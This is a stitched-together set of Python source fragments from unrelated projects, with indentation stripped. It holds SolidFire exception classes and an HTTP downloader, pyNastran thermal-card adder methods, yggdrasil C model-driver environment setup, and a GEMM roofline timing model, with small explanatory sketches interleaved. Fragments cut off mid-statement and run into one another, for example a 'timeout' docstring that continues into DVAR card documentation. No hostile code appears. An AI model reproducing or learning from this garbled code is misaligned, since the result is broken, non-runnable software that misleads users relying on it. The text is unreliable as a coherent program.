if not self.message and self.innerException:
# If this exception is actually a wrapper around another exception, get the inner
# Mostly URLError wrapping an OSError, socket.error or ssl.SSLError
innerReason = getattr(self.innerException, "reason", None)
if innerReason and isinstance(innerReason, Exception):
self.innerException = innerReason
if type(self.innerException) == six.moves.urllib.error.HTTPError:
if self.innerException.code in six.moves.BaseHTTPServer.BaseHTTPRequestHandler.responses:
self.message = 'HTTP Error {}: {}'.format(self.innerException.code, six.moves.BaseHTTPServer.BaseHTTPRequestHandler.responses[self.innerException.code])
self.code = self.innerException.code
else:
self.message = 'HTTP Error {}: {}'.format(self.innerException.code, self.innerException.reason)
self.code = self.innerException.code
# 401 - unauthorized
# 404 - not found
if self.code not in [401, 404]:
self.retryable = True
elif type(self.innerException) == six.moves.urllib.error.URLError:
self.message = '{}'.format(self.innerException.reason)
self.retryable = True
elif type(self.innerException) == socket.timeout:
self.message = 'Socket error 110: connection timed out'
self.code = 110
self.retryable = True
elif type(self.innerException) in [socket.herror, socket.gaierror]:
self.message = 'Socket error {}: {}'.format(self.innerException.args[0], self.innerException.args[1])
self.code = self.innerException.args[0]
# 54 - connection reset by peer
# 60 - operation timed out (BSD/macOS)
# 61 - connection refused (transient on restarts)
# 104 - connection reset by peer
# 110 - connection timed out
# 111 - connection refused (transient on restarts)
# 113 - no route to host (transient when node is rebooted)
if self.code in (54, 60, 61, 104, 110, 111, 113):
self.retryable = True
elif type(self.innerException) == OSError:
self.message = 'OSError {}: {}'.format(self.innerException.errno, self.innerException.strerror)
self.code = self.innerException.errno
elif type(self.innerException) == IOError:
self.message = 'IOError {}: {}'.format(self.innerException.errno, self.innerException.strerror)
self.code = self.innerException.errno
elif type(self.innerException) == six.moves.http_client.BadStatusLine:
self.message = 'Bad HTTP status'
self.retryable = True
elif type(self.innerException) == ValueError:
self.message = 'Received invalid JSON'
self.retryable = True
elif isinstance(self.innerException, ssl.SSLError):
# https://docs.python.org/2.7/library/ssl.html#functions-constants-and-exceptions
self.message = str(self.innerException)
self.retryable = True
if isinstance(self.innerException, ssl.CertificateError):
self.retryable = False
else:
import pprint
print("Unknown inner exception - {}".format(pprint.pformat(self.innerException)))
self.message = str(self.innerException)
self.retryable = False
def __str__(self):
# API calls:
# ExceptionName server=[{}] method=[{}], params=[{}] - error message=[{}], code=[{}]
# HTTP downloads:
# ExceptionName endpoint=[{}] - error name=[{}], message=[{}], code=[{}]
if self.method and self.params:
output = '{} server=[{}] method=[{}] params=[{}] - error message=[{}]'.format(self.__class__.__name__, self.ip, self.method, self.params, self.message)
else:
output = '{} endpoint=[{}] - error message=[{}]'.format(self.__class__.__name__, self.endpoint, self.message)
if self.code is not None:
output += ', code=[{}]'.format(self.code)
return output
def IsRetryable(self):
return self.retryable
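A standalone sketch of the unwrapping step at the top of `SFConnectionError.__init__`: urllib's `URLError` usually wraps the real socket/ssl error in `.reason`, so the handler prefers the inner exception when one is present. `FakeURLError` below is a test double, not the real urllib class.

```python
def unwrap(ex):
    """Prefer the wrapped exception in .reason when one exists."""
    reason = getattr(ex, 'reason', None)
    if isinstance(reason, Exception):
        return reason
    return ex

class FakeURLError(Exception):
    def __init__(self, reason):
        super().__init__(str(reason))
        self.reason = reason

inner = OSError(111, 'connection refused')
outer = FakeURLError(inner)
```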
class UnauthorizedError(SolidFireError):
"""Exception raised when an unauthorized response is returned from an SSH or HTTP SolidFire endpoint"""
@classmethod
def APIContext(cls, method, params, ip, endpoint):
"""
Create this exception with API call context
Args:
method: the SolidFire API method name (e.g. GetClusterInfo)
params: the SolidFire API method params (e.g. {"arg1" : "value"} )
ip: the IP address of the SolidFire endpoint (cluster MVIP or node MIP)
endpoint: the full SolidFire endpoint URL (e.g. https://ip:443/json-rpc/version)
"""
ex = cls("UnauthorizedError server=[{}] method=[{}], params=[{}] - error name=[{}], message=[{}], code=[{}]".format(ip, method, params, "xUnauthorized", "invalid credentials", 401))
#pylint: disable=attribute-defined-outside-init
ex.method = method
ex.params = params
ex.ip = ip
ex.endpoint = endpoint
ex.name = "xUnauthorized"
ex.code = 401
#pylint: enable=attribute-defined-outside-init
return ex
@classmethod
def IPContext(cls, ip):
"""
Create this exception with an IP endpoint
Args:
ip: the IP address/endpoint
"""
ex = cls("Invalid credentials for {}".format(ip))
#pylint: disable=attribute-defined-outside-init
ex.method = None
ex.params = None
ex.ip = ip
ex.endpoint = ip
ex.name = "xUnauthorized"
ex.code = 401
#pylint: enable=attribute-defined-outside-init
return ex
def IsRetryable(self):
return False
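A sketch of the alternate-constructor pattern `UnauthorizedError` uses above: classmethods build the same exception with different amounts of call context. The names here (`AuthError`, `for_api`, `for_ip`) are illustrative only.

```python
class AuthError(Exception):
    @classmethod
    def for_api(cls, method, ip):
        """Build with full API-call context."""
        ex = cls('unauthorized: {} on {}'.format(method, ip))
        ex.method, ex.ip, ex.code = method, ip, 401
        return ex

    @classmethod
    def for_ip(cls, ip):
        """Build with only an IP endpoint."""
        ex = cls('invalid credentials for {}'.format(ip))
        ex.method, ex.ip, ex.code = None, ip, 401
        return ex
```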
class LocalEnvironmentError(SolidFireError):
"""Exception raised when something goes wrong on the local system, outside of python.
This is basically a wrapper for python's EnvironmentError that is rooted in the SF exception hierarchy"""
def __init__(self, innerException):
"""
Initialize this exception with an existing exception
Arguments:
innerException: the exception to wrap. It must be an exception from the EnvironmentError hierarchy (IOError, OSError)
"""
# Make sure the input at least looks like an EnvironmentError
assert hasattr(innerException, 'errno')
assert hasattr(innerException, 'strerror')
self.args = (innerException,)
if innerException.strerror:
self.message = innerException.strerror.strip()
else:
self.message = str(innerException).strip()
super(LocalEnvironmentError, self).__init__(self.message)
self.innerException = innerException
self.errno = innerException.errno
def __str__(self):
return self.message
def IsRetryable(self):
return False
class ClientError(SolidFireError):
"""Base for all client exceptions"""
class ClientCommandError(ClientError):
"""Exception raised when command fails on a client"""
class ClientAuthorizationError(ClientError):
"""Exception raised when an unauthorized response is returned from a client"""
class ClientRefusedError(ClientError):
"""Exception raised when a connection is refused to a client"""
class ClientConnectionError(ClientError):
"""Exception raised when there is a problem connecting to a client"""
class HTTPDownloader(object):
"""
Download content from a URL
"""
def __init__(self, server, port=443, username=None, password=None):
"""
Args:
server: the IP address or resolvable hostname of the server to download from
port: the port to use
username: the name of an authorized user
password: <PASSWORD>
"""
self.server = server
self.port = port
self.username = username
self.password = password
self.log = GetLogger()
def Download(self, remotePath, useAuth=True, useSSL=True, timeout=300):
"""
Download a URL (GET) and return the content. For large binary files, see StreamingDownload
Args:
remotePath: the path component of the URL
useAuth: use Basic Auth when connecting
useSSL: Use SSL when connecting
timeout: | |
for all DVAR.
LABEL : str
Label used to describe variable in output.
DELTAB : float; default=0.02
The change in the dimensionless design variable B to be used in the
calculation of the design sensitivity coefficients.
VIDi : List[int]
Identification number of DVSET entry.
"""
fields = ['DVAR', bid, label, deltab] + vids
self.reject_card_lines('DVAR', print_card_(fields).split('\n'), show_log=False)
def add_extrn(self, nids: List[int], comps: List[str]):
fields = ['EXTRN']
for nid, comp in zip(nids, comps):
fields.extend([nid, comp])
self.reject_card_lines('EXTRN', print_card_(fields).split('\n'), show_log=False)
def add_panel(self, names: List[str], set_ids: List[int]) -> None:
fields = ['PANEL']
for name, set_id in zip(names, set_ids):
fields.extend([name, set_id])
self.reject_card_lines('PANEL', print_card_8(fields).split('\n'), show_log=False)
def add_cmfree(self, eid, s, s2, y, n) -> None:
fields = ['CMFREE', eid, s, s2, y, n]
self.reject_card_lines('CMFREE', print_card_8(fields).split('\n'), show_log=False)
def add_cfluid2(self, eid, ringfls, rho, b, harmonic) -> None:
fields = ['CFLUID2', eid] + ringfls + [rho, b, harmonic]
self.reject_card_lines('CFLUID2', print_card_8(fields).split('\n'), show_log=False)
def add_cfluid3(self, eid, ringfls, rho, b, harmonic) -> None:
fields = ['CFLUID3', eid] + ringfls + [rho, b, harmonic]
self.reject_card_lines('CFLUID3', print_card_8(fields).split('\n'), show_log=False)
def add_cfluid4(self, eid, ringfls, rho, b, harmonic) -> None:
fields = ['CFLUID4', eid] + ringfls + [rho, b, harmonic]
self.reject_card_lines('CFLUID4', print_card_8(fields).split('\n'), show_log=False)
def add_rgyro(self, sid, asynci, refrot, unit, speed_low, speed_high, speed,
comment='') -> None:
"""Creates an RGYRO card"""
fields = ['RGYRO', sid, asynci, refrot, unit, speed_low, speed_high, speed]
self.reject_card_lines('RGYRO', print_card_8(fields).split('\n'), show_log=False)
def add_rspint(self, rid, grida, gridb, gr, unit, table_id, comment='') -> None:
"""Creates an RSPINT card"""
fields = ['RSPINT', rid, grida, gridb, gr, unit, table_id]
self.reject_card_lines('RSPINT', print_card_8(fields).split('\n'), show_log=False)
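The adders above all share one pattern: flatten the card into a flat fields list, format it with a card printer, and hand the lines to `reject_card_lines`. A standalone sketch of the flattening step for an interleaved (name, value) card like PANEL:

```python
def panel_fields(names, set_ids):
    """Interleave names and set ids after the card keyword, PANEL-style."""
    fields = ['PANEL']
    for name, set_id in zip(names, set_ids):
        fields.extend([name, set_id])
    return fields
```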
def add_temp(self, sid, temperatures, comment='') -> TEMP:
"""
Creates a TEMP card
Parameters
----------
sid : int
Load set identification number
temperatures : dict[nid] : temperature
nid : int
node id
temperature : float
the nodal temperature
comment : str; default=''
a comment for the card
"""
temp = TEMP(sid, temperatures, comment=comment)
self._add_thermal_load_object(temp)
return temp
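The ``temperatures`` mapping accepted by ``add_temp`` pairs each node id with its nodal temperature on the card. A minimal sketch of that field layout (``temp_card_fields`` is a hypothetical illustration, not pyNastran's actual ``TEMP.raw_fields``):

```python
# Hypothetical sketch: lay out TEMP card fields from a {nid: temperature}
# mapping, mirroring the inputs add_temp accepts (not the real TEMP class).
def temp_card_fields(sid, temperatures):
    fields = ['TEMP', sid]
    for nid, temperature in sorted(temperatures.items()):
        fields.extend([nid, temperature])
    return fields

print(temp_card_fields(100, {10: 250.0, 11: 300.0}))
```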
#def add_tempp1(self) -> TEMPP1:
#temp = TEMPP1()
#self._add_thermal_load_object(temp)
#return temp
def add_tempd(self, sid, temperature, comment='') -> TEMPD:
"""
Creates a TEMPD card
Parameters
----------
sid : int
Load set identification number. (Integer > 0)
temperature : float
default temperature
comment : str; default=''
a comment for the card
"""
tempd = TEMPD(sid, temperature, comment=comment)
self._add_tempd_object(tempd)
return tempd
def add_qhbdy(self, sid, flag, q0, grids, af=None, comment='') -> QHBDY:
"""
Creates a QHBDY card
Parameters
----------
sid : int
load id
flag : str
valid_flags = {POINT, LINE, REV, AREA3, AREA4, AREA6, AREA8}
q0 : float
Magnitude of thermal flux into face. Q0 is positive for heat
into the surface
af : float; default=None
Area factor depends on type
grids : List[int]
Grid point identification of connected grid points
comment : str; default=''
a comment for the card
"""
load = QHBDY(sid, flag, q0, grids, af=af, comment=comment)
self._add_thermal_load_object(load)
return load
def add_qbdy1(self, sid, qflux, eids, comment='') -> QBDY1:
"""Creates a QBDY1 card"""
load = QBDY1(sid, qflux, eids, comment=comment)
self._add_thermal_load_object(load)
return load
def add_qbdy2(self, sid, eid, qfluxs, comment='') -> QBDY2:
"""Creates a QBDY1 card"""
load = QBDY2(sid, eid, qfluxs, comment=comment)
self._add_thermal_load_object(load)
return load
def add_qbdy3(self, sid, Q0, cntrlnd, eids, comment='') -> QBDY3:
"""
Creates a QBDY3 card
Parameters
----------
sid : int
Load set identification number. (Integer > 0)
Q0 : float
Magnitude of thermal flux vector into face
cntrlnd : int
Control point
eids : List[int] or THRU
Element identification number of a CHBDYE, CHBDYG, or
CHBDYP entry
comment : str; default=''
a comment for the card
"""
load = QBDY3(sid, Q0, cntrlnd, eids, comment=comment)
self._add_thermal_load_object(load)
return load
def add_qvol(self, sid, qvol, control_point, elements, comment='') -> QVOL:
"""Creates a QVOL card"""
load = QVOL(sid, qvol, control_point, elements, comment=comment)
self._add_load_object(load)
return load
def add_qvect(self, sid, q0, eids, t_source=None,
ce=0, vector_tableds=None, control_id=0, comment='') -> QVECT:
"""
Creates a QVECT card
Parameters
----------
sid : int
Load set identification number. (Integer > 0)
q0 : float; default=None
Magnitude of thermal flux vector into face
t_source : float; default=None
Temperature of the radiant source
ce : int; default=0
Coordinate system identification number for thermal vector flux
vector_tableds : List[int/float, int/float, int/float]
vector : float; default=0.0
directional cosines in coordinate system CE) of
the thermal vector flux
tabled : int
TABLEDi entry identification numbers defining the
components as a function of time
control_id : int; default=0
Control point
eids : List[int] or THRU
Element identification number of a CHBDYE, CHBDYG, or
CHBDYP entry
comment : str; default=''
a comment for the card
"""
load = QVECT(sid, q0, eids, t_source=t_source, ce=ce,
vector_tableds=vector_tableds, control_id=control_id,
comment=comment)
self._add_dload_entry(load)
return load
def add_chbdyg(self, eid, surface_type, nodes,
iview_front=0, iview_back=0,
rad_mid_front=0, rad_mid_back=0, comment='') -> CHBDYG:
"""Creates a CHBDYG card"""
elem = CHBDYG(eid, surface_type, nodes,
iview_front=iview_front, iview_back=iview_back,
rad_mid_front=rad_mid_front, rad_mid_back=rad_mid_back,
comment=comment)
self._add_thermal_element_object(elem)
return elem
def add_chbdyp(self, eid, pid, surface_type, g1, g2,
g0=0, gmid=None, ce=0,
iview_front=0, iview_back=0,
rad_mid_front=0, rad_mid_back=0,
e1=None, e2=None, e3=None,
comment='') -> CHBDYP:
"""
Creates a CHBDYP card
Parameters
----------
eid : int
Surface element ID
pid : int
PHBDY property entry identification numbers. (Integer > 0)
surface_type : str
Surface type
Must be {POINT, LINE, ELCYL, FTUBE, TUBE}
iview_front : int; default=0
A VIEW entry identification number for the front face.
iview_back : int; default=0
A VIEW entry identification number for the back face.
g1 / g2 : int
Grid point identification numbers of grids bounding the surface
g0 : int; default=0
Orientation grid point
rad_mid_front : int
RADM identification number for front face of surface element
rad_mid_back : int
RADM identification number for back face of surface element.
gmid : int
Grid point identification number of a midside node if it is used
with the line type surface element.
ce : int; default=0
Coordinate system for defining orientation vector
e1 / e2 / e3 : float; default=None
Components of the orientation vector in coordinate system CE.
The origin of the orientation vector is grid point G1.
comment : str; default=''
a comment for the card
"""
elem = CHBDYP(eid, pid, surface_type, g1, g2,
g0=g0, gmid=gmid, ce=ce,
iview_front=iview_front, iview_back=iview_back,
rad_mid_front=rad_mid_front, rad_mid_back=rad_mid_back,
e1=e1, e2=e2, e3=e3,
comment=comment)
self._add_thermal_element_object(elem)
return elem
def add_chbdye(self, eid, eid2, side,
iview_front=0, iview_back=0,
rad_mid_front=0, rad_mid_back=0,
comment='') -> CHBDYE:
"""
Creates a CHBDYE card
Parameters
----------
eid : int
surface element ID number for a side of an element
eid2: int
a heat conduction element identification
side: int
a consistent element side identification number (1-6)
iview_front: int; default=0
a VIEW entry identification number for the front face
iview_back: int; default=0
a VIEW entry identification number for the back face
rad_mid_front: int; default=0
RADM identification number for front face of surface element
rad_mid_back: int; default=0
RADM identification number for back face of surface element
comment : str; default=''
a comment for the card
"""
elem = CHBDYE(eid, eid2, side,
iview_front=iview_front, iview_back=iview_back,
rad_mid_front=rad_mid_front, rad_mid_back=rad_mid_back,
comment=comment)
self._add_thermal_element_object(elem)
return elem
def add_phbdy(self, pid, af=None, d1=None, d2=None, comment='') -> PHBDY:
"""
Creates a PHBDY card
Parameters
----------
pid : int
property id
af : int
Area factor of the surface used only for CHBDYP element
Must be {POINT, LINE, TUBE, ELCYL}
TUBE : constant thickness of hollow tube
d1, d2 : float; default=None
Diameters associated with the surface
Used with CHBDYP [ELCYL, TUBE, FTUBE] surface elements
comment : str; default=''
a comment for the card
"""
prop = PHBDY(pid, af=af, d1=d1, d2=d2, comment=comment)
self._add_phbdy_object(prop)
return prop
def add_conv(self, eid, pconid, ta, film_node=0, cntrlnd=0, comment='') -> CONV:
"""
Creates a CONV card
Parameters
----------
eid : int
element id
pconid : int
Convection property ID
ta : List[int]
Ambient points used for convection; 0's are allowed for TA2
and higher
film_node : int; default=0
Point for film convection fluid property temperature
cntrlnd : int; default=0
Control point for free convection boundary condition
comment : str; default=''
a comment for the card
"""
boundary_condition = CONV(eid, pconid, ta,
film_node=film_node, cntrlnd=cntrlnd,
comment=comment)
self._add_thermal_bc_object(boundary_condition, boundary_condition.eid)
return boundary_condition
def add_convm(self, eid, pconvm, ta1, film_node=0, cntmdot=0,
ta2=None,
directory for
the MacOS SDK that should be used. Defaults to None and is
ignored.
vcpkg_dir (str, optional): Full path to the root directory containing
a vcpkg installation. This should be the directory that contains
the vcpkg executable and any packages installed by vcpkg (in
subdirectories). Defaults to None and is ignored.
**kwargs: Additional keyword arguments are passed to the parent
class's method.
Returns:
list: Section, option, description tuples for options that could not
be set.
"""
# Set vcpkg_dir & macos_sdkroot before calling parent so that it can be
# used in get_search_path when searching for dependencies
if (cls.language is not None) and (not cfg.has_section(cls.language)):
cfg.add_section(cls.language)
if vcpkg_dir is None:
vcpkg_dir = os.environ.get('VCPKG_ROOT', None)
if vcpkg_dir is not None:
vcpkg_dir = os.path.abspath(vcpkg_dir)
if not os.path.isdir(vcpkg_dir): # pragma: debug
raise ValueError("Path to vcpkg root directory "
"does not exist: %s." % vcpkg_dir)
cfg.set(cls._language, 'vcpkg_dir', vcpkg_dir)
if macos_sdkroot is None:
macos_sdkroot = _osx_sysroot
if macos_sdkroot is not None:
if not os.path.isdir(macos_sdkroot): # pragma: debug
raise ValueError("Path to MacOS SDK root directory "
"does not exist: %s." % macos_sdkroot)
cfg.set(cls._language, 'macos_sdkroot', macos_sdkroot)
# Call __func__ to avoid directly invoking the class, which doesn't exist
# in after_registration where this is called
out = CompiledModelDriver.configure.__func__(cls, cfg, **kwargs)
# Change configuration to be directory containing include files
rjlib = cfg.get(cls._language, 'rapidjson_include', None)
if (rjlib is not None) and os.path.isfile(rjlib):
cfg.set(cls._language, 'rapidjson_include',
os.path.dirname(os.path.dirname(rjlib)))
nplib = cfg.get(cls._language, 'numpy_include', None)
if (nplib is not None) and os.path.isfile(nplib):
cfg.set(cls._language, 'numpy_include',
os.path.dirname(os.path.dirname(nplib)))
return out
@classmethod
def get_dependency_info(cls, dep, toolname=None, default=None):
r"""Get the dictionary of information associated with a
dependency.
Args:
dep (str): Name of internal or external dependency or full path
to the library.
toolname (str, optional): Name of compiler tool that should be used.
Defaults to None and the default compiler for the language will
be used.
default (dict, optional): Information dictionary that should
be returned if dep cannot be located. Defaults to None
and an error will be raised if dep cannot be found.
Returns:
dict: Dependency info.
"""
replaced_toolname = False
if platform._is_win and (dep == 'python_wrapper'):
# The Python library is compiled against MSVC so a wrapper is required
# to reconcile the differences in FILE* between gcc and MSVC.
if get_compilation_tool('compiler', 'cl').is_installed():
replaced_toolname = True
toolname = 'cl'
out = super(CModelDriver, cls).get_dependency_info(
dep, toolname=toolname, default=default)
if replaced_toolname:
out['remove_flags'] = ['/TP']
out['toolname'] = toolname
return out
@classmethod
def call_linker(cls, obj, language=None, **kwargs):
r"""Link several object files to create an executable or library (shared
or static), checking for errors.
Args:
obj (list): Object files that should be linked.
language (str, optional): Language that should be used to link
the files. Defaults to None and the language of the current
driver is used.
**kwargs: Additional keyword arguments are passed to run_executable.
Returns:
str: Full path to compiled source.
"""
if (((cls.language == 'c') and (language is None)
and kwargs.get('for_model', False)
and (not kwargs.get('skip_interface_flags', False)))):
language = 'c++'
kwargs.update(cls.update_linker_kwargs(**kwargs))
kwargs['skip_interface_flags'] = True
return super(CModelDriver, cls).call_linker(obj, language=language,
**kwargs)
@classmethod
def update_ld_library_path(cls, env, paths_to_add=None,
add_to_front=False, add_libpython_dir=False,
toolname=None, env_var=None, **kwargs):
r"""Update provided dictionary of environment variables so that
LD_LIBRARY_PATH includes the interface directory containing the interface
libraries.
Args:
env (dict): Dictionary of environment variables to be updated.
paths_to_add (list, optional): Paths that should be added. If not
provided, defaults to [cls.get_language_dir()].
add_to_front (bool, optional): If True, new paths are added to the
front, rather than the end. Defaults to False.
add_libpython_dir (bool, optional): If True, the directory
containing the Python C library will be added. Defaults
to False.
toolname (str, optional): Name of compiler tool that should be used.
Defaults to None and the default compiler for the language will
be used.
env_var (str, optional): Environment variable where the paths
should be added. Defaults to None and is only set for
linux (LD_LIBRARY_PATH) and windows (PATH).
**kwargs: Additional keyword arguments are ignored.
Returns:
dict: Updated dictionary of environment variables.
"""
if paths_to_add is None:
paths_to_add = []
paths_to_add = paths_to_add + [cls.get_language_dir()]
if add_libpython_dir:
paths_to_add = paths_to_add + [os.path.dirname(
cls.get_dependency_library('python', toolname=toolname))]
if platform._is_win and ygg_cfg.get('c', 'vcpkg_dir', None):
if platform._is_64bit:
arch = 'x64-windows'
else: # pragma: debug
arch = 'x86-windows'
raise NotImplementedError("Not yet tested on 32bit Python")
paths_to_add.append(os.path.join(ygg_cfg.get('c', 'vcpkg_dir'),
'installed', arch, 'bin'))
if env_var is None:
if platform._is_linux:
env_var = 'LD_LIBRARY_PATH'
elif platform._is_win:
env_var = 'PATH'
if env_var is not None:
path_list = []
prev_path = env.pop(env_var, '')
prev_path_list = prev_path.split(os.pathsep)
if prev_path:
path_list.append(prev_path)
for x in paths_to_add:
if x not in prev_path_list:
if add_to_front:
path_list.insert(0, x)
else:
path_list.append(x)
if path_list:
env[env_var] = os.pathsep.join(path_list)
return env
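The de-duplicating merge at the heart of ``update_ld_library_path`` can be isolated as a small sketch; ``merge_paths`` is a hypothetical stand-in for the in-method loop, not part of yggdrasil:

```python
import os

# Sketch of the env-var merge in update_ld_library_path: add each new path
# only if it is not already present; front-insertion reverses the order of
# the added paths, matching the insert(0, x) loop in the method above.
def merge_paths(prev_path, paths_to_add, add_to_front=False):
    prev_list = prev_path.split(os.pathsep)
    path_list = [prev_path] if prev_path else []
    for x in paths_to_add:
        if x not in prev_list:
            if add_to_front:
                path_list.insert(0, x)
            else:
                path_list.append(x)
    return os.pathsep.join(path_list)
```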
@classmethod
def update_python_path(cls, env):
r"""Update provided dictionary of environment variables so that
PYTHONPATH and PYTHONHOME are set as needed (primarily on windows).
Args:
env (dict): Dictionary of environment variables to be updated.
Returns:
dict: Updated dictionary of environment variables.
"""
if platform._is_win: # pragma: windows
env.setdefault('PYTHONHOME', sysconfig.get_config_var('prefix'))
env.setdefault('PYTHONPATH', os.pathsep.join([
sysconfig.get_path('stdlib'), sysconfig.get_path('purelib'),
os.path.join(sysconfig.get_config_var('prefix'), 'DLLs')]))
return env
@classmethod
def set_env_class(cls, **kwargs):
r"""Set environment variables that are instance independent.
Args:
**kwargs: Additional keyword arguments are passed to the parent
class's method and update_ld_library_path.
Returns:
dict: Environment variables for the model process.
"""
out = super(CModelDriver, cls).set_env_class(**kwargs)
out = cls.update_ld_library_path(out, **kwargs)
out = cls.update_python_path(out)
return out
@classmethod
def parse_var_definition(cls, io, value, **kwargs):
r"""Extract information about input/output variables from a
string definition.
Args:
io (str): Description of variables contained in the provided
string. Must be 'inputs' or 'outputs'.
value (str): String containing one or more variable definitions.
**kwargs: Additional keyword arguments are passed to the
parent class's method.
Returns:
list: List of information about the variables contained in
the provided string.
Raises:
AssertionError: If io is not 'inputs' or 'outputs'.
NotImplementedError: If the def_regex for the specified
io is not defined.
"""
out = super(CModelDriver, cls).parse_var_definition(io, value, **kwargs)
io_map = {x['name']: x for x in out}
for i, x in enumerate(out):
if (x['name'] + '_length') in io_map:
x['length_var'] = x['name'] + '_length'
elif ('length_' + x['name']) in io_map:
x['length_var'] = 'length_' + x['name']
elif (((x['name'] + '_ndim') in io_map)
and ((x['name'] + '_shape') in io_map)):
x['ndim_var'] = x['name'] + '_ndim'
x['shape_var'] = x['name'] + '_shape'
x['datatype']['type'] = 'ndarray'
elif ((('ndim_' + x['name']) in io_map)
and (('shape_' + x['name']) in io_map)):
x['ndim_var'] = 'ndim_' + x['name']
x['shape_var'] = 'shape_' + x['name']
x['datatype']['type'] = 'ndarray'
elif 'shape' in x:
x['datatype']['shape'] = [
int(float(s.strip('[]')))
for s in x.pop('shape').split('][')]
assert(x['datatype']['subtype'] in _valid_types)
if len(x['datatype']['shape']) == 1:
x['datatype']['length'] = x['datatype'].pop(
'shape')[0]
x['datatype']['type'] = '1darray'
else:
x['datatype']['type'] = 'ndarray'
return out
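The naming convention resolved above (a variable ``x`` pairs with a companion ``x_length`` or ``length_x``) can be sketched on its own; ``find_length_var`` is a hypothetical helper, not part of yggdrasil:

```python
# Sketch of the length-variable lookup in parse_var_definition: for a
# variable name, the first matching companion name in the I/O map wins.
def find_length_var(name, io_names):
    for candidate in (name + '_length', 'length_' + name):
        if candidate in io_names:
            return candidate
    return None
```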
@classmethod
def update_io_from_function(cls, model_file, model_function,
inputs=[], outputs=[], **kwargs):
r"""Update inputs/outputs from the function definition.
Args:
model_file (str): Full path to the file containing the model
function's declaration.
model_function (str): Name of the model function.
inputs (list, optional): List of model inputs including types.
Defaults to [].
outputs (list, optional): List of model outputs including types.
Defaults to [].
**kwargs: Additional keyword arguments are passed to the parent
class's method.
Returns:
dict, None: Flag variable used by the model. If None, the
model does not use a flag variable.
"""
flag_var = super(CModelDriver, cls).update_io_from_function(
model_file, model_function, inputs=inputs,
outputs=outputs, **kwargs)
# Add length_vars if missing for use by yggdrasil
for x in inputs:
for v in x['vars']:
if cls.requires_length_var(v) and (not v.get('length_var', False)):
v['length_var'] = {'name': v['name'] + '_length',
'datatype': {'type': 'uint',
'precision': 64},
'is_length_var': True,
'dependent': True}
elif cls.requires_shape_var(v):
if not (v.get('ndim_var', False)
and v.get('shape_var', False)): # pragma: debug
raise RuntimeError("Uncomment logic that follows.")
# if not v.get('ndim_var', False):
# v['ndim_var'] = {
# 'name': v['name'] + '_ndim',
# 'datatype': {'type': 'uint',
# 'precision': 64},
# 'is_length_var': True,
# 'dependent': True}
# if not v.get('shape_var', False):
# v['shape_var'] = {
# 'name': v['name'] + '_ndim',
# 'datatype': {'type': '1darray',
# 'subtype': 'uint',
# 'precision': 64},
# 'is_length_var': True,
# 'dependent': True}
for x in outputs:
for v in x['vars']:
if cls.requires_length_var(v) and (not v.get('length_var', False)):
self.th)
max_time = max(time)
if self.debug:
print('{}: {}'.format(name, max_time))
print('GEMM flops: {:,}'.format(flop))
for i in range(0, num_level):
print("L{}".format(i))
print("inflection_point: {:.2f}".format(inflection_point[i]))
print("comp_int: {:.2f}".format(comp_int[i]))
print("time: {}".format(time[i]))
print()
#print("Roofline: exited {}".format(name))
return max_time
#Convert GEMM into square tiles
# def getGEMMTime(self, A_, B_, C_, name):
#
# #A = util.power2RoundUp(A_)
# #B = util.power2RoundUp(B_)
# #C = util.power2RoundUp(C_)
# A = A_
# B = B_
# C = C_
# #return False, self.GEMM_wrapper(A, B, C, name)
# dim = min(min(A, B), C)
# Af = math.ceil(A / dim)
# Bf = math.ceil(B / dim)
# Cf = math.ceil(C / dim)
# time = (Af * Bf * Cf) * self.GEMM_Strassen(dim, name) + (Af * Cf * (Bf-1)) * self.getAddTime(dim, dim, name)
# return False, time
# def GEMM_Strassen(self, dim, name):
# if dim <= 512:
# time = self.GEMM_wrapper(dim, dim, dim, name)
# return time
# else:
# time = 7 * self.GEMM_Strassen(dim // 2, name) #+ 18 * self.getAddTime(dim // 2, dim // 2, name)
# return time
#
# def getAddTime(self, A, B, name):
# ADD_flop = A * B
# ADD_gmem = 3 * A * B * self.precision
# ADD_time = self.roofline(ADD_flop, ADD_gmem, name='FMA addition') + self.O
# return ADD_time
def getGEMMTime(self, dim1, dim2, dim3, name):
tile2time = {}
orderSpace = self.generateOrder(dim1, dim2, dim3, name)
for order_dims in orderSpace:
if self.debug:
print("===============================================================")
print("order: {}".format(order_dims))
print("===============================================================")
for tile_dims in self.tileSpace:
if self.debug:
print("++++++++++++++++++++++++++++++++++++++++++++++++++++++++++")
print("tile: {}".format(tile_dims))
print("++++++++++++++++++++++++++++++++++++++++++++++++++++++++++")
GEMM_flop, mem_access = self.GEMM(order_dims, tile_dims, name)
GEMM_time = self.roofline(GEMM_flop,mem_access, name) + self.O
tile2time[(order_dims, tile_dims)] = GEMM_time
best_tile = min(tile2time, key=tile2time.get)
best_time = tile2time[best_tile]
if self.debug:
print("{}: Best Time: {:,}, Best Order: {}, Best Tile: {}\n".format(name, best_time, best_tile[0], best_tile[1]))
return best_time, best_tile[0], best_tile[1]
def generateOrder(self, dim1, dim2, dim3, name):
if self.dataflow =="best": # best stationary
if dim1 >= max(dim2, dim3):
self.dataflow = "wst"
elif dim2 >= max(dim1, dim3):
self.dataflow = "ost"
elif dim3 >= max(dim1, dim2):
self.dataflow = "ast"
order=[]
if self.dataflow == "wst": #weight stationary
order.append((dim2, dim3, dim1))
if dim2 != dim3:
order.append((dim3, dim2, dim1))
elif self.dataflow == "ast": #activation stationary
order.append((dim1, dim2, dim3))
if dim2 != dim1:
order.append((dim2, dim1, dim3))
elif self.dataflow == "ost": #output stationary
order.append((dim1, dim3, dim2))
if dim1 != dim3:
order.append((dim3, dim1, dim2))
elif self.dataflow == "none": # not stationary
if dim1 != dim2 and dim2 != dim3 and dim1 != dim3:
order=list(itertools.permutations([dim1, dim2, dim3]))
elif dim1 == dim2 and dim2 != dim3:
order = [(dim1, dim2, dim3), (dim1, dim3, dim2), (dim3, dim1, dim2)]
elif dim1 == dim3 and dim2 != dim1:
order = [(dim1, dim2, dim3), (dim1, dim3, dim2), (dim2, dim1, dim3)]
elif dim2 == dim3 and dim1 != dim2:
order = [(dim1, dim2, dim3), (dim2, dim1, dim3), (dim2, dim3, dim1)]
return order
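The duplicate-aware branches above appear to enumerate exactly the distinct permutations of the three dimensions: 6 when all differ, 3 when exactly two coincide. A sketch of that equivalence using ``itertools.permutations`` (``distinct_orders`` is illustrative, not part of the model):

```python
import itertools

# Distinct loop orders for a GEMM dimension triple: deduplicated
# permutations collapse to the counts generateOrder's "none" branches build.
def distinct_orders(dims):
    return sorted(set(itertools.permutations(dims)))

print(len(distinct_orders((4, 8, 16))))  # all distinct -> 6 orders
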